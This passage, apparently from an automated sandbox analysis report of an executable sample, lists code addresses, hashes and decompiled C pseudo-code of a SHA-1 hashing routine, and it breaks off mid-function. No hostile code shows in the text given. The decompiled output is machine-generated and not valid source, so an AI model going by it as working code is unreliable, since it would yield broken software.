                  0x0115002e
                  0x01150035
                  0x0115003c
                  0x01150048
                  0x01150058
                  0x01150064
                  0x0115006e
                  0x01150078
                  0x01150082
                  0x0115008c
                  0x0115009b
                  0x011500ae
                  0x011500bc
                  0x011500c6
                  0x011500d0
                  0x011500da
                  0x011500e4
                  0x011500ee
                  0x011500f8
                  0x01150102
                  0x0115010c
                  0x01150116
                  0x01150120
                  0x0115012a
                  0x01150136
                  0x01150149
                  0x0115015a
                  0x01150164
                  0x0115016e
                  0x01150178
                  0x01150182
                  0x0115018e
                  0x011501a1
                  0x011501af
                  0x011501b9
                  0x011501c3
                  0x011501cd
                  0x011501d7
                  0x011501e1
                  0x011501eb
                  0x011501f5
                  0x011501ff
                  0x0115020b
                  0x0115021e
                  0x0115022c
                  0x01150236
                  0x01150240
                  0x0115024a
                  0x01150254
                  0x0115025e
                  0x01150268
                  0x01150272
                  0x01150291
                  0x0115029f
                  0x011502a9
                  0x011502b3
                  0x011502bd
                  0x011502c7
                  0x011502d1
                  0x011502db
                  0x011502e5
                  0x011502ef
                  0x011502f9
                  0x01150303
                  0x0115030f
                  0x01150322
                  0x01150331
                  0x0115033b
                  0x01150345
                  0x0115034f
                  0x0115035e
                  0x01150371
                  0x01150376
                  0x01150380
                  0x01150393
                  0x0115039d
                  0x011503a7
                  0x011503b1
                  0x011503bb
                  0x011503c5
                  0x011503cf
                  0x011503db
                  0x011503ee
                  0x011503fa
                  0x01150404
                  0x0115040e
                  0x01150418
                  0x01150422
                  0x0115042c
                  0x01150436
                  0x01150445
                  0x01150458
                  0x01150466
                  0x01150470
                  0x0115047a
                  0x01150484
                  0x0115048e
                  0x01150498
                  0x011504a2
                  0x011504ac
                  0x011504b6
                  0x011504c0
                  0x011504ca
                  0x011504d4
                  0x011504e0
                  0x011504f3
                  0x01150504
                  0x0115050e
                  0x01150518
                  0x01150522
                  0x0115052c
                  0x01150538
                  0x0115054b
                  0x01150554
                  0x0115055b
                  0x01150562
                  0x0115057e
                  0x0115058a
                  0x01150594
                  0x0115059e
                  0x011505a8
                  0x011505b2
                  0x011505bc
                  0x011505c6
                  0x011505d0
                  0x011505da
                  0x011505e4
                  0x011505ee
                  0x011505f8
                  0x01150602
                  0x0115060c
                  0x0115061b
                  0x0115062e
                  0x01150637
                  0x0115063e
                  0x01150645
                  0x0115064c
                  0x01150658
                  0x01150668
                  0x01150677
                  0x01150681
                  0x0115068b
                  0x01150695
                  0x0115069f
                  0x011506a9
                  0x011506b3
                  0x011506bd
                  0x011506c7
                  0x011506d1
                  0x011506db
                  0x011506e5
                  0x011506ef
                  0x011506fe
                  0x01150711
                  0x0115071d
                  0x01150727
                  0x01150731
                  0x0115073b
                  0x01150745
                  0x0115074f
                  0x01150771
                  0x0115077a
                  0x01150781
                  0x01150788
                  0x01150794
                  0x011507a4
                  0x011507ad
                  0x011507b4
                  0x011507bb
                  0x011507c7
                  0x011507d7
                  0x011507e6
                  0x011507f0
                  0x011507fa
                  0x01150804
                  0x0115080e
                  0x01150818
                  0x0115083a
                  0x01150845
                  0x0115084c
                  0x01150853
                  0x0115085a
                  0x01150863
                  0x01150873
                  0x01150881
                  0x0115088b
                  0x01150895
                  0x0115089f
                  0x011508a9
                  0x011508b3
                  0x011508bd
                  0x011508c7
                  0x011508e6
                  0x011508f4
                  0x011508fe
                  0x01150908
                  0x01150912
                  0x0115091c
                  0x01150926
                  0x01150930
                  0x0115093a
                  0x01150944
                  0x01150963
                  0x01150974
                  0x0115097e
                  0x01150988
                  0x01150992
                  0x0115099c
                  0x011509a6
                  0x011509b0
                  0x011509ba
                  0x011509c4
                  0x011509ce
                  0x011509d8
                  0x011509e4
                  0x011509f7
                  0x01150a02
                  0x01150a09
                  0x01150a10
                  0x01150a17
                  0x01150a30
                  0x01150a39
                  0x01150a40
                  0x01150a47
                  0x01150a4e
                  0x01150a6a
                  0x01150a6f
                  0x01150a79
                  0x01150a83
                  0x01150a8d
                  0x01150a97
                  0x01150aa1
                  0x01150aab
                  0x01150ab5
                  0x01150acb
                  0x01150ade
                  0x01150aef
                  0x01150af9
                  0x01150b03
                  0x01150b0d
                  0x01150b17
                  0x01150b21
                  0x01150b2b
                  0x01150b35
                  0x01150b54
                  0x01150b62
                  0x01150b6c
                  0x01150b76
                  0x01150b80
                  0x01150b8a
                  0x01150b94
                  0x01150b9e
                  0x01150ba8
                  0x01150bb2
                  0x01150bbc
                  0x01150bc6
                  0x01150bd2
                  0x01150be5
                  0x01150bf3
                  0x01150bfd
                  0x01150c07
                  0x01150c11
                  0x01150c1b
                  0x01150c25
                  0x01150c2f
                  0x01150c39
                  0x01150c43
                  0x01150c4d
                  0x01150c57
                  0x01150c63
                  0x01150c76
                  0x01150c7b
                  0x01150c85
                  0x01150c8f
                  0x01150c99
                  0x01150ca3
                  0x01150cad
                  0x01150cb7
                  0x01150ccd
                  0x01150ce0
                  0x01150cee
                  0x01150cf5
                  0x01150cfc
                  0x01150d03
                  0x01150d0c
                  0x01150d1c
                  0x01150d2a
                  0x01150d34
                  0x01150d3e
                  0x01150d48
                  0x01150d52
                  0x01150d5e
                  0x01150d71
                  0x01150d7f
                  0x01150d89
                  0x01150d93
                  0x01150d9d
                  0x01150da7
                  0x01150db1
                  0x01150dbb
                  0x01150dc5
                  0x01150de4
                  0x01150df0
                  0x01150dfa
                  0x01150e04
                  0x01150e0e
                  0x01150e30
                  0x01150e38
                  0x01150e42
                  0x01150e4c
                  0x01150e56
                  0x01150e60
                  0x01150e6a
                  0x01150e76
                  0x01150e7c
                  0x01150e82
                  0x01150e88
                  0x01150e8e
                  0x01150e9b
                  0x01150ea5
                  0x01150eaf
                  0x01150eb9
                  0x01150ec3
                  0x01150ed2
                  0x01150ee5
                  0x01150ef6
                  0x01150ef6
                  0x01150efb
                  0x01150f01
                  0x01150f13
                  0x01150f13
                  0x0114fea0
                  0x0114fea0
                  0x0114fea6
                  0x0114fea6

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: $ $ $ $ $ $ $0$3$7$7$A$A$A$A$B$B$B$B$B$B$B$C$C$C$C$C$C$C$C$C$C$C$C$D$E$E$E$F$G$G$I$K$K$M$M$M$O$O$O$P$P$Q$S$S$S$S$S$S$S$S$T$T$U$U$V$Y$\$\$\$\$\$\$\$\$a$a$a$a$a$a$a$a$a$a$a$b$c$c$c$d$d$d$d$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$e$f$f$f$g$g$h$h$i$i$i$i$i$i$i$i$i$i$j$k$k$k$l$l$l$l$l$l$m$m$m$m$m$m$m$m$m$n$n$n$n$n$n$n$n$n$n$n$n$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$o$p$p$p$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$r$s$s$s$s$s$t$t$t$t$t$t$t$t$t$t$t$t$u$u$u$u$u$u$v$v$w$w$w$w$w$w$w$w$w$w$x$y
                  • API String ID: 0-2578923714
                  • Opcode ID: 23d78bcf7e35131c5569bf9615cae1d997e9e7eb3126ac5fd744440a7427ca45
                  • Instruction ID: 0006e3867295126f63f5c5b263e59e511d2248d552d1a9f6615473619e395e1d
                  • Opcode Fuzzy Hash: 23d78bcf7e35131c5569bf9615cae1d997e9e7eb3126ac5fd744440a7427ca45
                  • Instruction Fuzzy Hash: 569209B1801329DEDB69DF50C848BEABBB9BF04708F0085DD951D6A211DBB55BC8CFA4
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 72%
                  			E0114B452(void* __edx, intOrPtr* _a4) {
                  				signed int* _v4;
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				char _v304;
                  				signed char* _t277;
                  				signed int* _t278;
                  				signed int _t279;
                  				signed int _t285;
                  				signed int _t288;
                  				signed int _t292;
                  				signed int _t295;
                  				signed int _t299;
                  				signed int _t303;
                  				signed int _t305;
                  				intOrPtr _t311;
                  				signed int _t319;
                  				signed int _t321;
                  				signed int _t324;
                  				signed int _t326;
                  				signed int _t335;
                  				signed int _t341;
                  				signed int _t342;
                  				signed int _t347;
                  				signed int _t355;
                  				signed int _t359;
                  				signed int _t360;
                  				signed int _t364;
                  				signed int _t367;
                  				signed int _t371;
                  				signed int _t372;
                  				signed int _t403;
                  				signed int _t408;
                  				signed int _t414;
                  				signed int _t417;
                  				signed int _t424;
                  				signed int _t427;
                  				signed int _t436;
                  				signed int _t438;
                  				signed int _t441;
                  				signed int _t449;
                  				signed int _t464;
                  				signed int _t467;
                  				signed int _t468;
                  				signed int _t469;
                  				signed int _t475;
                  				signed int _t483;
                  				signed int _t484;
                  				intOrPtr* _t485;
                  				signed int* _t488;
                  				signed int _t495;
                  				signed int _t498;
                  				signed int _t503;
                  				signed int _t506;
                  				signed int _t509;
                  				signed int _t512;
                  				signed int _t513;
                  				signed int _t517;
                  				signed int _t529;
                  				signed int _t532;
                  				signed int _t539;
                  				void* _t545;
                  				void* _t547;
                  
                  				_push(0xffffffc8);
                  				_push(_t544);
                  				_t545 = _t547;
                  				_t488 = _v4;
                  				_t355 = 0;
                  				_t2 =  &(_t488[7]); // 0xe909
                  				_t277 = _t2;
                  				do {
                  					 *(_t545 + _t355 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                  					 *(_t545 + _t355 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                  					 *(_t545 + _t355 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                  					 *(_t545 + _t355 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                  					_t355 = _t355 + 4;
                  					_t277 =  &(_t277[0x10]);
                  				} while (_t355 < 0x10);
                  				_t278 =  &_v304;
                  				_v8 = 0x10;
                  				do {
                  					_t403 =  *(_t278 - 0x18);
                  					_t464 =  *(_t278 - 0x14);
                  					_t359 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t403;
                  					asm("rol ecx, 1");
                  					asm("rol ebx, 1");
                  					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t464;
                  					_t278[8] = _t359;
                  					_t319 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                  					_t278 =  &(_t278[4]);
                  					asm("rol ebx, 1");
                  					asm("rol edx, 1");
                  					_t46 =  &_v8;
                  					 *_t46 = _v8 - 1;
                  					_t278[6] = _t319 ^ _t403;
                  					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t359 ^ _t464;
                  				} while ( *_t46 != 0);
                  				_t321 =  *_t488;
                  				_t279 = _t488[1];
                  				_t360 = _t488[2];
                  				_t408 = _t488[3];
                  				_v12 = _t321;
                  				_v16 = _t488[4];
                  				_v8 = 0;
                  				do {
                  					asm("rol ebx, 0x5");
                  					_t467 = _v8;
                  					_t495 = _t321 + ( !_t279 & _t408 | _t360 & _t279) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x14c)) + _v16 + 0x5a827999;
                  					_t324 = _v12;
                  					asm("ror eax, 0x2");
                  					_v16 = _t408;
                  					_v12 = _t495;
                  					asm("rol esi, 0x5");
                  					_v8 = _t360;
                  					_t414 = _t495 + ( !_t324 & _t360 | _t279 & _t324) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x148)) + _v16 + 0x5a827999;
                  					_t498 = _t279;
                  					asm("ror ebx, 0x2");
                  					_v16 = _v8;
                  					_t364 = _v12;
                  					_v8 = _t324;
                  					_t326 = _v8;
                  					_v12 = _t414;
                  					asm("rol edx, 0x5");
                  					_t285 = _t414 + ( !_t364 & _t498 | _t324 & _t364) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x144)) + _v16 + 0x5a827999;
                  					_t417 = _v12;
                  					_v16 = _t498;
                  					asm("ror ecx, 0x2");
                  					_v8 = _t364;
                  					_v12 = _t285;
                  					asm("rol eax, 0x5");
                  					_v16 = _t326;
                  					_t503 = _t285 + ( !_t417 & _t326 | _t364 & _t417) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x140)) + _v16 + 0x5a827999;
                  					_t360 = _v12;
                  					_t288 = _v8;
                  					asm("ror edx, 0x2");
                  					_v8 = _t417;
                  					_v12 = _t503;
                  					asm("rol esi, 0x5");
                  					_v16 = _t288;
                  					_t279 = _v12;
                  					_t506 = _t503 + ( !_t360 & _t288 | _t417 & _t360) +  *((intOrPtr*)(_t545 + _t467 * 4 - 0x13c)) + _v16 + 0x5a827999;
                  					_t408 = _v8;
                  					asm("ror ecx, 0x2");
                  					_t468 = _t467 + 5;
                  					_t321 = _t506;
                  					_v12 = _t321;
                  					_v8 = _t468;
                  				} while (_t468 < 0x14);
                  				_t469 = 0x14;
                  				do {
                  					asm("rol esi, 0x5");
                  					asm("ror eax, 0x2");
                  					_v16 = _t408;
                  					_t509 = _t506 + (_t408 ^ _t360 ^ _t279) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                  					_t335 = _v12;
                  					_v12 = _t509;
                  					asm("rol esi, 0x5");
                  					_t424 = _t509 + (_t360 ^ _t279 ^ _t335) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x148)) + _v16 + 0x6ed9eba1;
                  					asm("ror ebx, 0x2");
                  					_t512 = _t279;
                  					_v16 = _t360;
                  					_t367 = _v12;
                  					_v12 = _t424;
                  					asm("rol edx, 0x5");
                  					asm("ror ecx, 0x2");
                  					_t292 = _t424 + (_t279 ^ _t335 ^ _t367) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x144)) + _v16 + 0x6ed9eba1;
                  					_t427 = _v12;
                  					_v8 = _t335;
                  					_v8 = _t367;
                  					_v12 = _t292;
                  					asm("rol eax, 0x5");
                  					_t469 = _t469 + 5;
                  					_t360 = _v12;
                  					asm("ror edx, 0x2");
                  					_t146 = _t512 + 0x6ed9eba1; // 0x6edad48d
                  					_t513 = _t292 + (_t335 ^ _v8 ^ _t427) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x154)) + _t146;
                  					_t295 = _v8;
                  					_v8 = _t427;
                  					_v12 = _t513;
                  					asm("rol esi, 0x5");
                  					_t408 = _v8;
                  					_t506 = _t513 + (_t295 ^ _v8 ^ _t360) +  *((intOrPtr*)(_t545 + _t469 * 4 - 0x150)) + _t335 + 0x6ed9eba1;
                  					_v16 = _t295;
                  					_t279 = _v12;
                  					asm("ror ecx, 0x2");
                  					_v12 = _t506;
                  				} while (_t469 < 0x28);
                  				_v8 = 0x28;
                  				do {
                  					asm("rol esi, 0x5");
                  					_v16 = _t408;
                  					asm("ror eax, 0x2");
                  					_t517 = ((_t360 | _t279) & _t408 | _t360 & _t279) +  *((intOrPtr*)(_t545 + _v8 * 4 - 0x14c)) + _t506 + _v16 - 0x70e44324;
                  					_t475 = _v12;
                  					_v12 = _t517;
                  					asm("rol esi, 0x5");
                  					_t341 = _v8;
                  					asm("ror edi, 0x2");
                  					_t436 = ((_t279 | _t475) & _t360 | _t279 & _t475) +  *((intOrPtr*)(_t545 + _t341 * 4 - 0x148)) + _t517 + _v16 - 0x70e44324;
                  					_v16 = _t360;
                  					_t371 = _v12;
                  					_v12 = _t436;
                  					asm("rol edx, 0x5");
                  					_v8 = _t279;
                  					_t438 = ((_t475 | _t371) & _t279 | _t475 & _t371) +  *((intOrPtr*)(_t545 + _t341 * 4 - 0x144)) + _t436 + _v16 - 0x70e44324;
                  					asm("ror ecx, 0x2");
                  					_v16 = _v8;
                  					_t299 = _v12;
                  					_v8 = _t475;
                  					_v12 = _t438;
                  					asm("rol edx, 0x5");
                  					asm("ror eax, 0x2");
                  					_t529 = ((_t371 | _t299) & _t475 | _t371 & _t299) +  *((intOrPtr*)(_t545 + _t341 * 4 - 0x140)) + _t438 + _v16 - 0x70e44324;
                  					_v16 = _v8;
                  					_t441 = _t371;
                  					_t360 = _v12;
                  					_v8 = _t441;
                  					_v12 = _t529;
                  					asm("rol esi, 0x5");
                  					_v16 = _v8;
                  					_t506 = ((_t299 | _t360) & _t441 | _t299 & _t360) +  *((intOrPtr*)(_t545 + _t341 * 4 - 0x13c)) + _t529 + _v16 - 0x70e44324;
                  					_t408 = _t299;
                  					_t279 = _v12;
                  					asm("ror ecx, 0x2");
                  					_v12 = _t506;
                  					_t342 = _t341 + 5;
                  					_v8 = _t342;
                  				} while (_t342 < 0x3c);
                  				_t483 = 0x3c;
                  				_v8 = 0x3c;
                  				do {
                  					asm("rol esi, 0x5");
                  					_t484 = _v8;
                  					asm("ror eax, 0x2");
                  					_t532 = (_t408 ^ _t360 ^ _t279) +  *((intOrPtr*)(_t545 + _t483 * 4 - 0x14c)) + _t506 + _v16 - 0x359d3e2a;
                  					_t347 = _v12;
                  					_v16 = _t408;
                  					_v12 = _t532;
                  					asm("rol esi, 0x5");
                  					asm("ror ebx, 0x2");
                  					_t449 = (_t360 ^ _t279 ^ _t347) +  *((intOrPtr*)(_t545 + _t484 * 4 - 0x148)) + _t532 + _v16 - 0x359d3e2a;
                  					_v16 = _t360;
                  					_t372 = _v12;
                  					_v12 = _t449;
                  					asm("rol edx, 0x5");
                  					_v16 = _t279;
                  					asm("ror ecx, 0x2");
                  					_t303 = (_t279 ^ _t347 ^ _t372) +  *((intOrPtr*)(_t545 + _t484 * 4 - 0x144)) + _t449 + _v16 - 0x359d3e2a;
                  					_t408 = _v12;
                  					_v12 = _t303;
                  					asm("rol eax, 0x5");
                  					_v16 = _t347;
                  					_t539 = (_t347 ^ _t372 ^ _t408) +  *((intOrPtr*)(_t545 + _t484 * 4 - 0x140)) + _t303 + _v16 - 0x359d3e2a;
                  					_t305 = _t372;
                  					_v8 = _t347;
                  					asm("ror edx, 0x2");
                  					_v8 = _t372;
                  					_t360 = _v12;
                  					_v12 = _t539;
                  					asm("rol esi, 0x5");
                  					_t483 = _t484 + 5;
                  					_t506 = (_t305 ^ _t408 ^ _t360) +  *((intOrPtr*)(_t545 + _t484 * 4 - 0x13c)) + _t539 + _v16 - 0x359d3e2a;
                  					_v16 = _t305;
                  					_t279 = _v12;
                  					asm("ror ecx, 0x2");
                  					_v8 = _t408;
                  					_v12 = _t506;
                  					_v8 = _t483;
                  				} while (_t483 < 0x50);
                  				_t485 = _a4;
                  				 *((intOrPtr*)(_t485 + 8)) =  *((intOrPtr*)(_t485 + 8)) + _t360;
                  				 *((intOrPtr*)(_t485 + 0xc)) =  *((intOrPtr*)(_t485 + 0xc)) + _t408;
                  				_t311 =  *((intOrPtr*)(_t485 + 0x10)) + _v16;
                  				 *_t485 =  *_t485 + _t506;
                  				 *((intOrPtr*)(_t485 + 4)) =  *((intOrPtr*)(_t485 + 4)) + _t279;
                  				 *((intOrPtr*)(_t485 + 0x10)) = _t311;
                  				 *((intOrPtr*)(_t485 + 0x5c)) = 0;
                  				return _t311;
                  			}


































































                  0x0114b454
                  0x0114b457
                  0x0114b458
                  0x0114b462
                  0x0114b466
                  0x0114b468
                  0x0114b468
                  0x0114b46b
                  0x0114b48d
                  0x0114b4b3
                  0x0114b4d9
                  0x0114b4fb
                  0x0114b502
                  0x0114b505
                  0x0114b508
                  0x0114b511
                  0x0114b517
                  0x0114b51e
                  0x0114b52f
                  0x0114b532
                  0x0114b535
                  0x0114b539
                  0x0114b53b
                  0x0114b53d
                  0x0114b546
                  0x0114b549
                  0x0114b54c
                  0x0114b557
                  0x0114b55d
                  0x0114b55f
                  0x0114b55f
                  0x0114b562
                  0x0114b565
                  0x0114b565
                  0x0114b56a
                  0x0114b56c
                  0x0114b56f
                  0x0114b572
                  0x0114b578
                  0x0114b57b
                  0x0114b57e
                  0x0114b587
                  0x0114b58d
                  0x0114b596
                  0x0114b5a5
                  0x0114b5ac
                  0x0114b5af
                  0x0114b5b2
                  0x0114b5bb
                  0x0114b5be
                  0x0114b5c1
                  0x0114b5d9
                  0x0114b5e0
                  0x0114b5e2
                  0x0114b5e5
                  0x0114b5e8
                  0x0114b5f1
                  0x0114b5f8
                  0x0114b5fb
                  0x0114b5fe
                  0x0114b60d
                  0x0114b614
                  0x0114b617
                  0x0114b61a
                  0x0114b623
                  0x0114b62d
                  0x0114b630
                  0x0114b63c
                  0x0114b63f
                  0x0114b646
                  0x0114b649
                  0x0114b64c
                  0x0114b651
                  0x0114b654
                  0x0114b65d
                  0x0114b66e
                  0x0114b671
                  0x0114b674
                  0x0114b67b
                  0x0114b67e
                  0x0114b681
                  0x0114b684
                  0x0114b686
                  0x0114b689
                  0x0114b68c
                  0x0114b695
                  0x0114b69a
                  0x0114b69a
                  0x0114b6af
                  0x0114b6b2
                  0x0114b6b5
                  0x0114b6bc
                  0x0114b6bf
                  0x0114b6c2
                  0x0114b6d7
                  0x0114b6de
                  0x0114b6e1
                  0x0114b6e5
                  0x0114b6e8
                  0x0114b6ed
                  0x0114b6f0
                  0x0114b6ff
                  0x0114b702
                  0x0114b709
                  0x0114b70c
                  0x0114b70f
                  0x0114b712
                  0x0114b715
                  0x0114b71d
                  0x0114b72b
                  0x0114b72e
                  0x0114b731
                  0x0114b731
                  0x0114b738
                  0x0114b73b
                  0x0114b73e
                  0x0114b746
                  0x0114b754
                  0x0114b757
                  0x0114b75e
                  0x0114b761
                  0x0114b764
                  0x0114b767
                  0x0114b76a
                  0x0114b773
                  0x0114b77a
                  0x0114b77a
                  0x0114b780
                  0x0114b799
                  0x0114b79c
                  0x0114b7a3
                  0x0114b7a6
                  0x0114b7a9
                  0x0114b7bb
                  0x0114b7c5
                  0x0114b7c8
                  0x0114b7d1
                  0x0114b7d4
                  0x0114b7db
                  0x0114b7de
                  0x0114b7e4
                  0x0114b7f7
                  0x0114b7fe
                  0x0114b801
                  0x0114b804
                  0x0114b807
                  0x0114b810
                  0x0114b813
                  0x0114b826
                  0x0114b829
                  0x0114b833
                  0x0114b836
                  0x0114b838
                  0x0114b841
                  0x0114b844
                  0x0114b857
                  0x0114b85d
                  0x0114b860
                  0x0114b867
                  0x0114b869
                  0x0114b86c
                  0x0114b86f
                  0x0114b872
                  0x0114b875
                  0x0114b878
                  0x0114b881
                  0x0114b886
                  0x0114b889
                  0x0114b889
                  0x0114b89c
                  0x0114b89f
                  0x0114b8a2
                  0x0114b8a9
                  0x0114b8ac
                  0x0114b8af
                  0x0114b8b2
                  0x0114b8c5
                  0x0114b8c8
                  0x0114b8d3
                  0x0114b8d6
                  0x0114b8e2
                  0x0114b8e5
                  0x0114b8eb
                  0x0114b8ee
                  0x0114b8f1
                  0x0114b8f8
                  0x0114b908
                  0x0114b90b
                  0x0114b911
                  0x0114b914
                  0x0114b91b
                  0x0114b91d
                  0x0114b920
                  0x0114b923
                  0x0114b926
                  0x0114b929
                  0x0114b930
                  0x0114b93f
                  0x0114b942
                  0x0114b949
                  0x0114b94c
                  0x0114b94f
                  0x0114b952
                  0x0114b955
                  0x0114b958
                  0x0114b95b
                  0x0114b964
                  0x0114b975
                  0x0114b97d
                  0x0114b983
                  0x0114b986
                  0x0114b988
                  0x0114b98b
                  0x0114b98e
                  0x0114b99b

                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.324717900.0000000001141000.00000020.00000001.01000000.00000003.sdmp, Offset: 01140000, based on PE: true
                  • Associated: 00000000.00000002.324711621.0000000001140000.00000002.00000001.01000000.00000003.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_1140000_nSMFpXgLe7.jbxd
                  Yara matches
                  Similarity
                  • API ID:
                  • String ID: (
                  • API String ID: 0-3887548279
                  • Opcode ID: 813b67e1480152116196dee10a49b6cc27a47a2d74abf295679f5f3f0fb653ed
                  • Instruction ID: caada7c80c6c92e1fbd0ba2cb469e5601a31de91e8fce91548a2d936defc4515
                  • Opcode Fuzzy Hash: 813b67e1480152116196dee10a49b6cc27a47a2d74abf295679f5f3f0fb653ed
                  • Instruction Fuzzy Hash: 90022D76E006199FDB14CF9AC8805DDFBF2FF88314F1AC1AAD849A7355D674AA418F80
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 73%
                  			E0114B457(signed int* _a4) {
                  				signed int _v8;
                  				signed int _v12;
                  				signed int _v16;
                  				char _v304;
                  				signed char* _t277;
                  				signed int* _t278;
                  				signed int _t279;
                  				signed int _t285;
                  				signed int _t288;
                  				signed int _t292;
                  				signed int _t295;
                  				signed int _t299;
                  				signed int _t303;
                  				signed int _t305;
                  				signed int _t311;
                  				signed int _t318;
                  				signed int _t320;
                  				signed int _t323;
                  				signed int _t325;
                  				signed int _t334;
                  				signed int _t340;
                  				signed int _t341;
                  				signed int _t346;
                  				signed int _t353;
                  				signed int _t357;
                  				signed int _t358;
                  				signed int _t362;
                  				signed int _t365;
                  				signed int _t369;
                  				signed int _t370;
                  				signed int _t399;
                  				signed int _t404;
                  				signed int _t410;
                  				signed int _t413;
                  				signed int _t420;
                  				signed int _t423;
                  				signed int _t432;
                  				signed int _t434;
                  				signed int _t437;
                  				signed int _t445;
                  				signed int _t459;
                  				signed int _t462;
                  				signed int _t463;
                  				signed int _t464;
                  				signed int _t470;
                  				signed int _t478;
                  				signed int _t479;
                  				signed int* _t480;
                  				signed int* _t481;
                  				signed int _t488;
                  				signed int _t491;
                  				signed int _t496;
                  				signed int _t499;
                  				signed int _t502;
                  				signed int _t505;
                  				signed int _t506;
                  				signed int _t510;
                  				signed int _t522;
                  				signed int _t525;
                  				signed int _t532;
                  				void* _t536;
                  
                  				_t481 = _a4;
                  				_t353 = 0;
                  				_t2 =  &(_t481[7]); // 0xe909
                  				_t277 = _t2;
                  				do {
                  					 *(_t536 + _t353 * 4 - 0x14c) = ((( *(_t277 - 1) & 0x000000ff) << 0x00000008 |  *_t277 & 0x000000ff) << 0x00000008 | _t277[1] & 0x000000ff) << 0x00000008 | _t277[2] & 0x000000ff;
                  					 *(_t536 + _t353 * 4 - 0x148) = (((_t277[3] & 0x000000ff) << 0x00000008 | _t277[4] & 0x000000ff) << 0x00000008 | _t277[5] & 0x000000ff) << 0x00000008 | _t277[6] & 0x000000ff;
                  					 *(_t536 + _t353 * 4 - 0x144) = (((_t277[7] & 0x000000ff) << 0x00000008 | _t277[8] & 0x000000ff) << 0x00000008 | _t277[9] & 0x000000ff) << 0x00000008 | _t277[0xa] & 0x000000ff;
                  					 *(_t536 + _t353 * 4 - 0x140) = (((_t277[0xb] & 0x000000ff) << 0x00000008 | _t277[0xc] & 0x000000ff) << 0x00000008 | _t277[0xd] & 0x000000ff) << 0x00000008 | _t277[0xe] & 0x000000ff;
                  					_t353 = _t353 + 4;
                  					_t277 =  &(_t277[0x10]);
                  				} while (_t353 < 0x10);
                  				_t278 =  &_v304;
                  				_v8 = 0x10;
                  				do {
                  					_t399 =  *(_t278 - 0x18);
                  					_t459 =  *(_t278 - 0x14);
                  					_t357 =  *(_t278 - 0x20) ^ _t278[5] ^  *_t278 ^ _t399;
                  					asm("rol ecx, 1");
                  					asm("rol ebx, 1");
                  					_t278[9] =  *(_t278 - 0x1c) ^ _t278[6] ^ _t278[1] ^ _t459;
                  					_t278[8] = _t357;
                  					_t318 = _t278[7] ^  *(_t278 - 0x10) ^ _t278[2];
                  					_t278 =  &(_t278[4]);
                  					asm("rol ebx, 1");
                  					asm("rol edx, 1");
                  					_t46 =  &_v8;
                  					 *_t46 = _v8 - 1;
                  					_t278[6] = _t318 ^ _t399;
                  					_t278[7] =  *(_t278 - 0x1c) ^  *(_t278 - 4) ^ _t357 ^ _t459;
                  				} while ( *_t46 != 0);
                  				_t320 =  *_t481;
                  				_t279 = _t481[1];
                  				_t358 = _t481[2];
                  				_t404 = _t481[3];
                  				_v12 = _t320;
                  				_v16 = _t481[4];
                  				_v8 = 0;
                  				do {
                  					asm("rol ebx, 0x5");
                  					_t462 = _v8;
                  					_t488 = _t320 + ( !_t279 & _t404 | _t358 & _t279) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x14c)) + _v16 + 0x5a827999;
                  					_t323 = _v12;
                  					asm("ror eax, 0x2");
                  					_v16 = _t404;
                  					_v12 = _t488;
                  					asm("rol esi, 0x5");
                  					_v8 = _t358;
                  					_t410 = _t488 + ( !_t323 & _t358 | _t279 & _t323) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x148)) + _v16 + 0x5a827999;
                  					_t491 = _t279;
                  					asm("ror ebx, 0x2");
                  					_v16 = _v8;
                  					_t362 = _v12;
                  					_v8 = _t323;
                  					_t325 = _v8;
                  					_v12 = _t410;
                  					asm("rol edx, 0x5");
                  					_t285 = _t410 + ( !_t362 & _t491 | _t323 & _t362) +  *((intOrPtr*)(_t536 + _t462 * 4 - 0x144)) + _v16 + 0x5a827999;
                  					_t413 = _v12;
                  					_v16 = _t491;
                  					asm("ror ecx, 0x2");
                  					_v8 = _t362;
                  					_v12 = _t285;
